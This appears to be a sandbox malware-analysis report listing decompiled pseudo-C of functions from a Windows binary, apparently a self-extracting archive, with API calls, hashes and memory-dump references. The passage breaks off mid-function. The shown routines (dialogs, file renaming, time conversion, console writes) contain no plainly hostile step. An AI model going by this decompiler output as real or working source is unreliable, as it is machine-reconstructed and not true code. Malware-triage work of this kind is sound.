                                                                                                                                                    0x0122ac70
                                                                                                                                                    0x0122ac65
                                                                                                                                                    0x0122ac6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ac6e
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0122AC70
                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0122AC97
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0122ACB0
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0122ACC1
                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0122ACCA
                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0122ACDE
                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0122ACF4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                    • String ID: LICENSEDLG
                                                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                                                    • Opcode ID: 6c55c88d3c084b4708ff5e2980fbefb90a9e055f59f86f031c72bd85a3d1bc8d
                                                                                                                                                    • Instruction ID: eb954a8023acba5dafedafc941b840483e3f8ac8b4798fef220840042a8ee583
                                                                                                                                                    • Opcode Fuzzy Hash: 6c55c88d3c084b4708ff5e2980fbefb90a9e055f59f86f031c72bd85a3d1bc8d
                                                                                                                                                    • Instruction Fuzzy Hash: AF21A23136021ABBE2325F69FD4DE7F3F6CEB46B41F004414F74197898DA6298119731
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012193E0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E012193E0(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E0122E0E4(E01241CBC, _t84);
				E0122E1C0();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4034;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5034, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E0121BBC5(_t91, _t84 - 0x4034);
							_t78 = E0121BBC5(_t91, _t84 - 0x5034);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E01221708( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E01221708(E0121BBC5(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0121FD96(_t84 - 0x1010, _t82, 0x800);
											E01213FD6(E0121BBC5(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E0121A0C0(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0121FD96(_t84 - 0x3034, _t82, 0x800);
										_push(0x800);
										E0121BC3B(_t98, _t84 - 0x3034,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3034, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E012195B6(_t84 - 0x2034);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E0121A0C0(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E012196BE(_t84 - 0x2034);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3034);
											if(_t68 != 0) {
												E01219670(_t84 - 0x2034);
												E012197B7(_t84 - 0x2034, _t82);
											}
											E012195E8(_t84 - 0x2034, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

















                                                                                                                                                    0x012193e5
                                                                                                                                                    0x012193ef
                                                                                                                                                    0x012193f6
                                                                                                                                                    0x012193f9
                                                                                                                                                    0x01219408
                                                                                                                                                    0x01219410
                                                                                                                                                    0x012195a1
                                                                                                                                                    0x012195a1
                                                                                                                                                    0x012195a1
                                                                                                                                                    0x0121941e
                                                                                                                                                    0x01219427
                                                                                                                                                    0x0121942f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219435
                                                                                                                                                    0x01219435
                                                                                                                                                    0x01219437
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121943d
                                                                                                                                                    0x01219449
                                                                                                                                                    0x01219458
                                                                                                                                                    0x0121945a
                                                                                                                                                    0x0121945f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219465
                                                                                                                                                    0x01219469
                                                                                                                                                    0x0121946e
                                                                                                                                                    0x01219470
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219476
                                                                                                                                                    0x0121947e
                                                                                                                                                    0x01219485
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121948b
                                                                                                                                                    0x0121948b
                                                                                                                                                    0x01219492
                                                                                                                                                    0x01219494
                                                                                                                                                    0x01219494
                                                                                                                                                    0x01219497
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012194a6
                                                                                                                                                    0x012194c3
                                                                                                                                                    0x012194c8
                                                                                                                                                    0x012194d9
                                                                                                                                                    0x012194e6
                                                                                                                                                    0x012194db
                                                                                                                                                    0x012194db
                                                                                                                                                    0x012194dd
                                                                                                                                                    0x012194dd
                                                                                                                                                    0x012194ed
                                                                                                                                                    0x012194f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012194f8
                                                                                                                                                    0x012194f8
                                                                                                                                                    0x012194fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012194fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012194f6
                                                                                                                                                    0x0121950f
                                                                                                                                                    0x01219514
                                                                                                                                                    0x0121951f
                                                                                                                                                    0x0121953a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121953c
                                                                                                                                                    0x01219542
                                                                                                                                                    0x01219548
                                                                                                                                                    0x01219552
                                                                                                                                                    0x01219554
                                                                                                                                                    0x01219556
                                                                                                                                                    0x01219562
                                                                                                                                                    0x01219562
                                                                                                                                                    0x01219572
                                                                                                                                                    0x0121957a
                                                                                                                                                    0x01219582
                                                                                                                                                    0x0121958d
                                                                                                                                                    0x0121958d
                                                                                                                                                    0x01219598
                                                                                                                                                    0x0121959d
                                                                                                                                                    0x0121959d
                                                                                                                                                    0x0121953a
                                                                                                                                                    0x01219485
                                                                                                                                                    0x01219470
                                                                                                                                                    0x0121945f
                                                                                                                                                    0x01219437
                                                                                                                                                    0x0121942f
                                                                                                                                                    0x012195a3
                                                                                                                                                    0x012195a9
                                                                                                                                                    0x012195b3

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 012193E5
                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 01219408
                                                                                                                                                    • GetShortPathNameW.KERNEL32 ref: 01219427
                                                                                                                                                      • Part of subcall function 01221708: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011708,0121BA45,00000000,.exe,?,?,00000800,?,?,0122854F,?), ref: 0122171E
                                                                                                                                                    • _swprintf.LIBCMT ref: 012194C3
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 01219532
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 01219572
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                    • API String ID: 2111052971-3303766350
                                                                                                                                                    • Opcode ID: 0beb2e831968130b2a61ef27750db59dc8158cc5575428a539861b870ffdc4b8
                                                                                                                                                    • Instruction ID: 7e54a166c1abf5471cb058908b6519f6bf3a1171264e1e0ef373fdfb8a5bd9cb
                                                                                                                                                    • Opcode Fuzzy Hash: 0beb2e831968130b2a61ef27750db59dc8158cc5575428a539861b870ffdc4b8
                                                                                                                                                    • Instruction Fuzzy Hash: DB41817192125ABADF30EF64DD54EEE77BCBF70384F0004A5A645E7049EA748B88CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012209EA, Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E012209EA(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0122E740( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0121AC35() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0x124d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E01220B57(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E0122E7B0( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}




















                                                                                                                                                    0x012209ea
                                                                                                                                                    0x012209f1
                                                                                                                                                    0x01220a02
                                                                                                                                                    0x01220a06
                                                                                                                                                    0x01220a14
                                                                                                                                                    0x01220a32
                                                                                                                                                    0x01220a43
                                                                                                                                                    0x01220a53
                                                                                                                                                    0x01220a63
                                                                                                                                                    0x01220a75
                                                                                                                                                    0x01220a7d
                                                                                                                                                    0x01220a83
                                                                                                                                                    0x01220a89
                                                                                                                                                    0x01220a8d
                                                                                                                                                    0x01220a8f
                                                                                                                                                    0x01220a16
                                                                                                                                                    0x01220a20
                                                                                                                                                    0x01220a20
                                                                                                                                                    0x01220a9d
                                                                                                                                                    0x01220aa3
                                                                                                                                                    0x01220aae
                                                                                                                                                    0x01220aaf
                                                                                                                                                    0x01220ab4
                                                                                                                                                    0x01220ab9
                                                                                                                                                    0x01220abe
                                                                                                                                                    0x01220ac6
                                                                                                                                                    0x01220ace
                                                                                                                                                    0x01220ad6
                                                                                                                                                    0x01220adc
                                                                                                                                                    0x01220ade
                                                                                                                                                    0x01220ae1
                                                                                                                                                    0x01220ae4
                                                                                                                                                    0x01220ae9
                                                                                                                                                    0x01220aed
                                                                                                                                                    0x01220af2
                                                                                                                                                    0x01220af3
                                                                                                                                                    0x01220afa
                                                                                                                                                    0x01220afd
                                                                                                                                                    0x01220b00
                                                                                                                                                    0x01220b03
                                                                                                                                                    0x01220b06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220b06
                                                                                                                                                    0x01220b08
                                                                                                                                                    0x01220b08
                                                                                                                                                    0x01220b10
                                                                                                                                                    0x01220b1c
                                                                                                                                                    0x01220b1c
                                                                                                                                                    0x01220b2b
                                                                                                                                                    0x01220b31
                                                                                                                                                    0x01220b3a

                                                                                                                                                    APIs
                                                                                                                                                    • __aulldiv.LIBCMT ref: 012209FD
                                                                                                                                                      • Part of subcall function 0121AC35: GetVersionExW.KERNEL32(?), ref: 0121AC5A
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 01220A20
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 01220A32
                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01220A43
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01220A53
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01220A63
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 01220A9D
                                                                                                                                                    • __aullrem.LIBCMT ref: 01220B2B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                                    • Opcode ID: 10065d78b6eb74e5d6eac5b112ca8a7f327cbe95c0237ab3474e3186a31afc54
                                                                                                                                                    • Instruction ID: 9eed2033fea864b31abac765303d853f2cdf9dd69304012671f1f88f6a9ddef0
                                                                                                                                                    • Opcode Fuzzy Hash: 10065d78b6eb74e5d6eac5b112ca8a7f327cbe95c0237ab3474e3186a31afc54
                                                                                                                                                    • Instruction Fuzzy Hash: A9413A75408316AFC324DF65D88496FF7F9FF98214F004A2EF68692640E775E548CB52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123EC6D, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E0123EC6D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1270290 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1270290 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E01239DA7(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1270290 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1270290 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1270290 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E0123895A( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0123895A();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0122EA8A(_v8 ^ _t136);
			}


































                                                                                                                                                    0x0123ec75
                                                                                                                                                    0x0123ec7c
                                                                                                                                                    0x0123ec7f
                                                                                                                                                    0x0123ec87
                                                                                                                                                    0x0123ec8b
                                                                                                                                                    0x0123ec97
                                                                                                                                                    0x0123ec9a
                                                                                                                                                    0x0123ec9d
                                                                                                                                                    0x0123eca4
                                                                                                                                                    0x0123ecac
                                                                                                                                                    0x0123ecaf
                                                                                                                                                    0x0123ecb5
                                                                                                                                                    0x0123ecbb
                                                                                                                                                    0x0123ecc0
                                                                                                                                                    0x0123ecc2
                                                                                                                                                    0x0123ecc5
                                                                                                                                                    0x0123ecca
                                                                                                                                                    0x0123ecd4
                                                                                                                                                    0x0123ecdb
                                                                                                                                                    0x0123ecde
                                                                                                                                                    0x0123ece5
                                                                                                                                                    0x0123ecec
                                                                                                                                                    0x0123ed18
                                                                                                                                                    0x0123ed3e
                                                                                                                                                    0x0123ed40
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123ed1a
                                                                                                                                                    0x0123ed1d
                                                                                                                                                    0x0123ede4
                                                                                                                                                    0x0123edf0
                                                                                                                                                    0x0123edfb
                                                                                                                                                    0x0123ee00
                                                                                                                                                    0x0123ed23
                                                                                                                                                    0x0123ed2a
                                                                                                                                                    0x0123ed2f
                                                                                                                                                    0x0123ed35
                                                                                                                                                    0x0123ed3b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123ed3b
                                                                                                                                                    0x0123ed35
                                                                                                                                                    0x0123ed1d
                                                                                                                                                    0x0123ecee
                                                                                                                                                    0x0123ecf2
                                                                                                                                                    0x0123ecf5
                                                                                                                                                    0x0123ecfb
                                                                                                                                                    0x0123ecfd
                                                                                                                                                    0x0123ed00
                                                                                                                                                    0x0123ed04
                                                                                                                                                    0x0123ed41
                                                                                                                                                    0x0123ed44
                                                                                                                                                    0x0123ed45
                                                                                                                                                    0x0123ed4a
                                                                                                                                                    0x0123ed50
                                                                                                                                                    0x0123ed56
                                                                                                                                                    0x0123ed65
                                                                                                                                                    0x0123ed6b
                                                                                                                                                    0x0123ed71
                                                                                                                                                    0x0123ed76
                                                                                                                                                    0x0123ed92
                                                                                                                                                    0x0123ee05
                                                                                                                                                    0x0123ee0b
                                                                                                                                                    0x0123ed94
                                                                                                                                                    0x0123ed94
                                                                                                                                                    0x0123ed9c
                                                                                                                                                    0x0123eda5
                                                                                                                                                    0x0123edab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123edad
                                                                                                                                                    0x0123edaf
                                                                                                                                                    0x0123edb2
                                                                                                                                                    0x0123edcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123edcd
                                                                                                                                                    0x0123edd1
                                                                                                                                                    0x0123edd3
                                                                                                                                                    0x0123edd6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123edd6
                                                                                                                                                    0x0123edd1
                                                                                                                                                    0x0123edcb
                                                                                                                                                    0x0123edab
                                                                                                                                                    0x0123eda5
                                                                                                                                                    0x0123ed92
                                                                                                                                                    0x0123ed76
                                                                                                                                                    0x0123ed50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123edd9
                                                                                                                                                    0x0123edd9
                                                                                                                                                    0x0123ee0d
                                                                                                                                                    0x0123ee1f

                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0123F3E2,00000000,00000000,00000000,00000000,00000000,0123487F), ref: 0123ECAF
                                                                                                                                                    • __fassign.LIBCMT ref: 0123ED2A
                                                                                                                                                    • __fassign.LIBCMT ref: 0123ED45
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0123ED6B
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0123F3E2,00000000,?,?,?,?,?,?,?,?,?,0123F3E2,00000000), ref: 0123ED8A
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0123F3E2,00000000,?,?,?,?,?,?,?,?,?,0123F3E2,00000000), ref: 0123EDC3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                    • Opcode ID: bb543ac109ad8d3be29afff810179b3c2b1a237156370dcd707d61e5f52fe210
                                                                                                                                                    • Instruction ID: 6995c013dfdc804621e9732725f25d7322c0c9a8bec2d54e3c7f9e6c12cc208a
                                                                                                                                                    • Opcode Fuzzy Hash: bb543ac109ad8d3be29afff810179b3c2b1a237156370dcd707d61e5f52fe210
                                                                                                                                                    • Instruction Fuzzy Hash: F251F5B1E10209DFDB10CFA8E889AEEBBF9FF49310F15451AEA55E7241D7709944CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122C3AB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E0122C3AB(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t259;
				signed int _t273;
				void* _t276;
				signed int _t277;
				void* _t281;

				L0:
				while(1) {
					L0:
					_t259 = __ebx;
					if(__ebx != 1) {
						goto L110;
					}
					L94:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E0121B147(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L96:
						_push( *0x124d5f8);
						__ebp - 0x7c84 = E01213FD6(0x125846a, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E0121A0C0(0x125846a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L95:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L97:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x125846a);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L162:
							_push(0x1000);
							_t195 = _t281 - 0xe; // 0xffffa36e
							_t196 = _t281 - 0xd; // 0xffffa36f
							_t197 = _t281 - 0x5c84; // 0xffff46f8
							_t198 = _t281 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t281 + 0xc)));
							_t207 = E0122A986();
							_t259 =  *((intOrPtr*)(_t281 + 0x10));
							 *((intOrPtr*)(_t281 + 0xc)) = _t207;
							if(_t207 != 0) {
								_t208 = _t281 - 0x5c84;
								_t276 = _t281 - 0x1bc8c;
								_t273 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
